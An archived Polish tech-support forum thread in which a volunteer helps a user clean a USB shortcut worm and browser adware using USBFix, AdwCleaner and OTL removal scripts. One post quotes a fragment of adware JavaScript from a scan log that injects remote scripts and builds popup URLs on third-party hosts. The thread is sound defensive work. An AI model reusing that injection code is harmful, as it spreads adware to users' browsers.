Skocz do zawartości
Zamknięcie Forum PC LAB

Szanowny Użytkowniku,

Informujemy, że za 30 dni tj. 30 listopada 2024 r. serwis internetowy Forum PC LAB zostanie zamknięty.

Administrator Serwisu Forum PC LAB - Ringier Axel Springer Polska sp. z o.o. z siedzibą w Warszawie: wypowiada całość usług Serwisu Forum PC LAB z zachowaniem miesięcznego okresu wypowiedzenia.

Administrator Serwisu Forum PC LAB informuje, że:

  1. Z dniem 29 listopada 2024 r. zakończy się świadczenie wszystkich usług Serwisu Forum PC LAB. Ważną przyczyną uzasadniającą wypowiedzenie jest zamknięcie Serwisu Forum PC LAB
  2. Dotychczas zamowione przez Użytkownika usługi Serwisu Forum PC LAB będą świadczone w okresie wypowiedzenia tj. do dnia 29 listopada 2024 r.
  3. Po ogłoszeniu zamknięcia Serwisu Forum od dnia 30 października 2024 r. zakładanie nowych kont w serwisie Forum PC LAB nie będzie możliwe
  4. Wraz z zamknięciem Serwisu Forum PC LAB, tj. dnia 29 listopada 2024 r. nie będzie już dostępny katalog treści Forum PC LAB. Do tego czasu Użytkownicy Forum PC LAB mają dostęp do swoich treści w zakładce "Profil", gdzie mają możliwość ich skopiowania lub archiwizowania w formie screenshotów.
  5. Administrator danych osobowych Użytkowników - Ringier Axel Springer Polska sp. z o.o. z siedzibą w Warszawie zapewnia realizację praw podmiotów danych osobowych przez cały okres świadczenia usług Serwisu Forum PC LAB. Szczegółowe informacje znajdziesz w Polityce Prywatności

Administrator informuje, iż wraz z zamknięciem Serwisu Forum PC LAB, dane osobowe Użytkowników Serwisu Forum PC LAB zostaną trwale usunięte ze względu na brak podstawy ich dalszego przetwarzania. Proces trwałego usuwania danych z kopii zapasowych może przekroczyć termin zamknięcia Forum PC LAB o kilka miesięcy. Wyjątek może stanowić przetwarzanie danych użytkownika do czasu zakończenia toczących się postepowań.

Temat został przeniesiony do archiwum

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

swiatek94

Niecodzienny probelm ze skrótami zamiast folderów

Rekomendowane odpowiedzi

Witam serdecznie.

 

Otóż mam taki problem, po zmiane podzespołów komputer nie chciał w ogóle ruszyć (zmiana podstawki z LGA775 na LGA1150) i zamina na 64bitowy system.

Więc zgrałem wszystkie najważniejsze dane z C, sformatowałem partycje i wrzuciłem na nią od nowa system, tylko że 64bitowy.

Po zrobieniu wszystkiego komputer działa, aż miło, ale mam strasznie irytujący problem z folderami, bo zamieniły się w skróty, a po instalacji ESET'a zaczął on wszystkie te skróty chować do kwarantanny i oznaczać jako robaki.

 

Podejrzewam, że mogłem się tym zarazić poprzez komputer znajomego, który ma rój wirusów, ale było już po fakcie.

 

Podysłam logi z OTL i bardzo proszę o pomoc.

Pozdrawiam!

Extras.Txt

OTL.rar

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

1) Użyj >USBFix

Kliknij w nim na: DELETION.

Daj raport z tego usuwania.

 

2) Uruchom OTL i w oknie Własne opcje skanowania/Skrypt wklej to:

:OTL

O4 - HKU\S-1-5-21-460538346-33770204-3440770194-1000..\Run: [Kusetipdgyrycxxa.exe] C:\Users\Kuba\AppData\Roaming\Kusetipdgyrycxxa.exe (NoVirusThanks Company Srl)

[2014-02-03 22:24:19 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Uprdlisakhgfwloj.exe

[2014-02-03 22:18:33 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Rkgjltelguqeiqla.exe

[2014-02-03 22:14:52 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Cxrvaainodggstxh.exe

[2014-02-03 22:14:28 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Ahlthychnwxchbia.exe

[2014-02-03 22:14:07 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Mystuixnvbftnplk.exe

[2014-02-03 22:12:06 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Axkkxtpxlbslykst.exe

[2014-02-03 22:11:28 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Jafoyxccmeppejjc.exe

[2014-02-03 22:10:35 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Kpvevpuaksozdfbe.exe

[2014-02-03 22:10:32 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Qhdyjyrfmbmvlksb.exe

[2014-02-03 22:09:40 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Nxrbkrhuqmlmoxht.exe

[2014-02-03 22:09:36 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Hwsgebjewnpdcmfj.exe

[2014-02-03 22:03:46 | 000,618,496 | RH-- | C] (NoVirusThanks Company Srl) -- C:\Users\Kuba\AppData\Roaming\Jpzxcxljovxccksm.exe

 

:Commands

[emptytemp]

Kliknij w Wykonaj Skrypt. Zatwierdź restart komputera. Zapisz raport, który pokaże się po restarcie.

Następnie uruchom OTL ponownie, tym razem kliknij Skanuj.

Pokaż nowy log OTL.txt oraz raport z usuwania Skryptem.

 

Error - 2014-02-01 23:41:00 | Computer Name = Kuba-Komputer | Source = WinMgmt | ID = 10

Description =

http://support.microsoft.com/kb/2545227/en-us

 

Uruchom narzędzie Fix-it:

Link zapasowy > http://www.mediafire.com/download/6hwcm6b77098cbb/MicrosoftFixit50688.msi

(kliknij przycisk Uruchom w oknie dialogowym Pobieranie pliku i wykonaj kroki w kreatorze Fix.it. )

 

F.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Problem ze skrótami zniknął, ale mam wrażenie, że jak włożę tego pendrive'a do komputera znajomego i z powrotem do mnie, to problem się odnowi.

Może zaaplikuje usbfix u niego również ? Czy bez logów OTL nie ma się co bawić w niepewne programy ?

 

1. Log w załączniku

2. Logi w załączniku

3. Ten skrypt został przetworzony, to tyle jeśli chodzi fixit ? Czy trzeba coś jeszcze zrobić?

UsbFix_Report.txt

otl (2).rar

Extras2.Txt

OTL2.rar

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Uruchom OTL i w oknie Własne opcje skanowania/Skrypt wklej to:

:Files

D:\snkb0pt

E:\snkb0pt

 

:Commands

[emptytemp]

Kliknij w Wykonaj Skrypt. Zatwierdź restart komputera. Zapisz raport, który pokaże się po restarcie.

 

mam wrażenie, że jak włożę tego pendrive'a do komputera znajomego i z powrotem do mnie, to problem się odnowi.

Na Twoim penie USBFix postawił folder zaporowy "autorun.inf", wiec infekcja tak łatwo sie nie przedostanie.

Ale na wszelki wypadek niech znajomy też użyje USBFix z opcji DELETION.

 

F.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

1. Proszę log

 

2. W porządku, więc zrobię to samo u niego, ale mimo tego i tak wrzucę skany z OTL. Mogę je wkleić tutaj, czy założyć do tego osobny temat ? ( Dodam, że jego komputer jest strasznie zainfekowany, bo działa naprawdę niczym żółw )

otl3.txt

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Jeśli jest strasznie zawirusowany, to lepiej założyć nowy temat.

 

F.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Raczej tak, choc sprawa nie jest jednoznaczna: w logu USBFix, już po usuwaniu, było widać:

[03/02/2014 - 23:19:39 | SHD] - D:\snkb0pt

[03/02/2014 - 23:19:39 | SHD] - E:\snkb0pt

Natomiast w raporcie z usuwania Skryptem:

File\Folder D:\snkb0pt not found.

File\Folder E:\snkb0pt not found.

trudno mi uwierzyć, że same znikły między użyciem USBFix, a Skryptem.

 

F.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Teraz nie mam czasu, by dokładniej sie przyjrzeć logom.

 

1) Użyj >Adw-cleaner (aby pobrać kliknij na dużą zieloną strzałkę po prawej).

najpierw kliknij na SZUKAJ, a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk USUŃ, to kliknij na niego.

Pokaż raport z niego C:\AdwCleaner\AdwCleaner.txt

 

2) Uruchom OTL i w oknie Własne opcje skanowania/Skrypt wklej to:

:OTL

[2013-11-09 14:26:04 | 000,000,000 | ---D | M] -- C:\Users\Oskar\AppData\Roaming\0F1F1C2Y1H1P1C0I0T

[2014-02-04 16:00:03 | 000,553,472 | RHS- | M] () -- C:\Windows\mdm.exe

O4 - HKU\S-1-5-21-1481462056-3189292-2853702214-1000..\Run: [Microsoft Firevall Engine] c:\Windows\mdm.exe ()

O4 - HKU\S-1-5-21-1481462056-3189292-2853702214-1000..\Run: [ChomikBox] C:\Program Files\ChomikBox\chomikbox.exe File not found

O4 - HKU\S-1-5-21-1481462056-3189292-2853702214-1000..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\DTLite.exe" -autorun File not found

O4 - HKU\S-1-5-21-1481462056-3189292-2853702214-1000..\Run: [Adobe Flash Reader XI] C:\Users\Oskar\AppData\Roaming\adbreader.exe

O4 - HKLM..\Run: [Microsoft Firevall Engine] c:\Windows\mdm.exe ()

O2 - BHO: (SearchNewTab) - {E20AE397-7EB9-F955-047C-2D273B9587FB} - C:\Program Files\SearchNewTab\nTNbr.dll File not found

O2 - BHO: (DOOwnLoad KeEpiEr) - {F9E1876B-0FC6-8CDE-64AE-673AD983F8BA} - C:\Program Files\DOOwnLoad KeEpiEr\joCgoMT.dll File not found

O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.

O4 - HKLM..\Run: [Adobe Flash Reader XI] C:\Users\Oskar\AppData\Roaming\adbreader.exe ()

O2 - BHO: (Dowwnnlooad KeepoeR) - {1BF603B6-A262-A76A-F3AE-E1EC039E87E4} - C:\Program Files\Dowwnnlooad KeepoeR\t.dll File not found

O2 - BHO: (SearchNewTab) - {7A4029B1-E178-6181-8864-52A282CF5AF2} - C:\Program Files\SearchNewTab\uZ2kh.dll File not found

 

:Files

C:\Users\Oskar\AppData\Roaming\*.exe

 

:Commands

[emptytemp]

 

Kliknij w Wykonaj Skrypt. Zatwierdź restart komputera. Zapisz raport, który pokaże się po restarcie.

Następnie uruchom OTL ponownie, tym razem kliknij Skanuj.

Pokaż nowy log OTL.txt oraz raport z usuwania Skryptem.

 

(zajrzę tu dopiero ok. 21:30)

 

F.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

lecz PC dalej strasznie wolno mu działa.

ja nie zajmuję się wolno działającymi komputerami, takie problemy mnie w ogóle nie interesują.

 

id=13227253830098126207&eid=308&pid=856\";if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+ d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache1-a.akamaihd.net/loaders/1630/l.js?aoi=1311798366&pid=1630&zoneid=287942&ext=Download%20keeper\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;new function(){var a=this;a.domain_storage=\"http://xls.searchfun.in/nx\";a.prefix=\"if72ru4ruh7fewui\";a.conf={\"1\":{\"0\":1,\"1\":21600,\"2\":0,\"3\":0,\"4\":0,\"5\":21600,\"6\":21600,\"7\":0,\"8\":0,\"9\":21600,\"10\":21600,\"11\":0,\"12\":21600,\"13\":21600,\"17\":0,\"18\":12345,\"19\":21600,\"20\":21600,\"21\":21600,\"22\":21600,\"29\":21600,\"30\":21600,\"32\":0,\"33\":21600,\"35\":21600,\"41\":0,\"44\":21600,\"45\":21600,\"46\":0,\"47\":21600},\"3\":{\"0\":1,\"1\":0,\"5\":0,\"6\":0,\"9\":0,\"10\":0,\"12\":0,\"13\":0,\"17\":0,\"19\":0,\"20\":0,\"21\":0,\"22\":0,\"29\":0,\"30\":0,\"32\":0,\"33\":0,\"35\":0,\"41\":0,\"44\":0,\"45\":0,\"46\":0,\"47\":0}};a.pop_collision_id=\"__ipu=1\";a.setStorage=function(b,e,d){localStorage.setItem(a.prefix+\"_\"+b+\"_site\",e+parseInt(d));localStorage.setItem(a.prefix+\"_\"+b+\"_global\",e)};a.ajax=new function(){var b=this;b.get=function(e,d){try{var c=a.utils.randomChar();\"undefined\"!==typeof b[c]&&(c=a.utils.randomChar());b[c]=new XMLHttpRequest;b[c].open(\"GET\",e,!0);b[c].onreadystatechange=function(){4==b[c].readyState&& d(b[c].responseText)};b[c].send()}catch(f){}};b.post=function(e,a,c){b.xhr=new XMLHttpRequest;b.xhr.open(\"POST\",e,!0);b.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");b.xhr.onreadystatechange=function(){4==b.xhr.readyState&&c(b.xhr.responseText)};a=encodeURIComponent(a);b.xhr.send(a)}};a.utils=new function(){var b=this;b.randomChar=function(){for(var b=\"\",a=0;2>a;a++)b+=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\".charAt(Math.floor(52*Math.random())); return b};b.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};b.inject_script=function(b){if(b instanceof Array)for(var a=0;a<b.length;a++){var c=document.createElement(\"script\");c.type=\"text/javascript\";var f=b[a];\"function\"==typeof f?c.text=f:c.src=f;document.getElementsByTagName(\"body\")[0].appendChild©}};b.epoch=function(){return Math.floor((new Date).getTime()/1E3)};b.getKeywords= function(){var b=document.title,a=document.getElementsByTagName(\"meta\");if(a)for(var c=0,f=a.length;c<f;c++)\"keywords\"==a[c].name.toLowerCase()&&(b+=\" \"+a[c].content.replace(/,/g,\" \"));return b.replace(/[_-]/g,\" \")};b.getVert=function(){var a=localStorage.getItem(\"sk398erjds2d\");return a?a:b.forexVert()}};a.products=new function(){var b=this;b.code_1=function(a,d,c,f,g,h){c=\"http://childsafedownloadx.asia/?vert=\"+c+\"&rff=\"+window.self.location.hostname+\"&pid=856&hid=13227253830098126207&ch=61&\"+ h;localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_site\",d+parseInt(f));localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_global\",d+parseInt(g));(function(a){(function(a){var c=top!=b&&\"string\"===typeof top.document.location.toString()?top:b,e=null,d={},f=d.name||Math.floor(1E3*Math.random()+1),g=d.width||window.outerWidth||window.innerWidth||document.documentElement.clientWidth,h=d.height||window.outerHeight-100||windo

Część logu wygląda jak sieczka, a nie jak normalny log.

Nie wiem, czy w tej sieczce jest coś do usuwania, czy nie ma.

 

Uruchom OTL i w oknie Własne opcje skanowania/Skrypt wklej to:

:OTL

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\rdvgkmd.sys -- (VGPU)

FF - prefs.js..browser.search.defaultenginename: "Improved Search"

FF - prefs.js..browser.search.order.1: "Improved Search"

FF - prefs.js..browser.search.selectedEngine: "Improved Search"

[2013-10-26 11:26:16 | 000,000,000 | ---D | M] ("MetaCrawler New Tab") -- C:\Users\Oskar\AppData\Roaming\Mozilla\Firefox\Profiles\kehh52yh.default\extensions\{60364604-8b4c-42f4-a2ca-a76ca7b61b37}

[2013-12-13 16:12:29 | 000,000,000 | ---D | M] (New tab) -- C:\Users\Oskar\AppData\Roaming\Mozilla\Firefox\Profiles\kehh52yh.default\extensions\{FB03E2DD-24F9-EC9D-03B1-8B5B4738179C}

[2013-10-27 19:47:14 | 000,000,000 | ---D | M] (SearchNewTab) -- C:\Users\Oskar\AppData\Roaming\Mozilla\Firefox\Profiles\kehh52yh.default\extensions\bc33qgtx@ymo-.net

[2013-10-25 13:53:37 | 000,000,000 | ---D | M] (metacrawler.com) -- C:\Users\Oskar\AppData\Roaming\Mozilla\Firefox\Profiles\kehh52yh.default\extensions\ffxtlbr@metacrawler.com

[2013-10-27 19:47:14 | 000,000,000 | ---D | M] (DOOwnLoad KeEpiEr) -- C:\Users\Oskar\AppData\Roaming\Mozilla\Firefox\Profiles\kehh52yh.default\extensions\sjpvwzgh@eommdol.edu

[2013-10-27 19:47:14 | 000,000,000 | ---D | M] (SearchNewTab) -- C:\Users\Oskar\AppData\Roaming\Mozilla\Firefox\Profiles\kehh52yh.default\extensions\uueubye_eya@ktj-jzgo.co.uk

[2013-10-27 19:47:14 | 000,000,000 | ---D | M] (Dowwnnlooad KeepoeR) -- C:\Users\Oskar\AppData\Roaming\Mozilla\Firefox\Profiles\kehh52yh.default\extensions\xoa@oerztxoi.co.uk

[2014-01-11 19:33:48 | 000,001,818 | ---- | M] () -- C:\Users\Oskar\AppData\Roaming\Mozilla\Firefox\Profiles\kehh52yh.default\searchplugins\improvedsearch.xml

O4 - HKU\S-1-5-21-1481462056-3189292-2853702214-1000..\Run: [Adobe Driver Update] C:\Users\Oskar\AppData\Roaming\adobereader.exe File not found

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_26-windows-i586.cab (Reg Error: Key error.)

O16 - DPF: {CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_26-windows-i586.cab (Reg Error: Key error.)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_26-windows-i586.cab (Java Plug-in 1.6.0_26)

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Reg Error: Key error.)

[2012-12-28 18:02:20 | 000,000,000 | ---D | M] -- C:\Users\Oskar\AppData\Roaming\Ywloup

[2012-10-21 15:45:02 | 000,000,000 | ---D | M] -- C:\Users\Oskar\AppData\Roaming\Ovve

[2012-10-21 15:45:02 | 000,000,000 | ---D | M] -- C:\Users\Oskar\AppData\Roaming\Oxawmy

[2013-10-30 22:07:26 | 000,000,000 | ---D | M] -- C:\Users\Oskar\AppData\Roaming\SmileysWeLove

 

:Reg

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8}]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"=-

[HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"=-

[HKEY_USERS\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"=-

[HKEY_USERS\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"=-

[HKEY_USERS\S-1-5-21-1481462056-3189292-2853702214-1000\Software\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"=-

[-HKEY_USERS\S-1-5-21-1481462056-3189292-2853702214-1000\Software\Microsoft\Internet Explorer\SearchScopes\{cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8}]

[-HKEY_USERS\S-1-5-21-1481462056-3189292-2853702214-1000\Software\Microsoft\Internet Explorer\SearchScopes\46CDEA554F134FA0B7E4F845FB1B1BC0]

[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2]

 

:Commands

[emptytemp]

Kliknij w Wykonaj Skrypt. Zatwierdź restart komputera. Zapisz raport, który pokaże się po restarcie.

Następnie uruchom OTL ponownie, tym razem kliknij Skanuj.

Pokaż nowy log OTL.txt oraz raport z usuwania Skryptem.

 

F.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Jeszcze drobna kosmetyka:

Uruchom OTL i w oknie Własne opcje skanowania/Skrypt wklej to:

:OTL

O4 - HKU\S-1-5-21-1481462056-3189292-2853702214-1000..\Run: [soumu] C:\Users\Oskar\AppData\Roaming\Oxawmy\subea.exe File not found

 

:Commands

[emptytemp]

Kliknij w Wykonaj Skrypt.

 

Raportu już nie dawaj.

 

Kończymy:

Uruchom OTL i w oknie Własne opcje skanowania/Skrypt wklej to:

:OTL

O4 - HKU\S-1-5-21-1481462056-3189292-2853702214-1000..\Run: [soumu] C:\Users\Oskar\AppData\Roaming\Oxawmy\subea.exe File not found

 

:Commands

[emptytemp]

Kliknij w Wykonaj Skrypt.

 

F.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Przepraszam, że dopiero teraz odpisuje, oczywiście z moim komputerem wszystko w porządku, z kolegi aktualnie również.

Dziękuje serdecznie Tobie za pomoc !

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

  • Ostatnio przeglądający   0 użytkowników

    Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...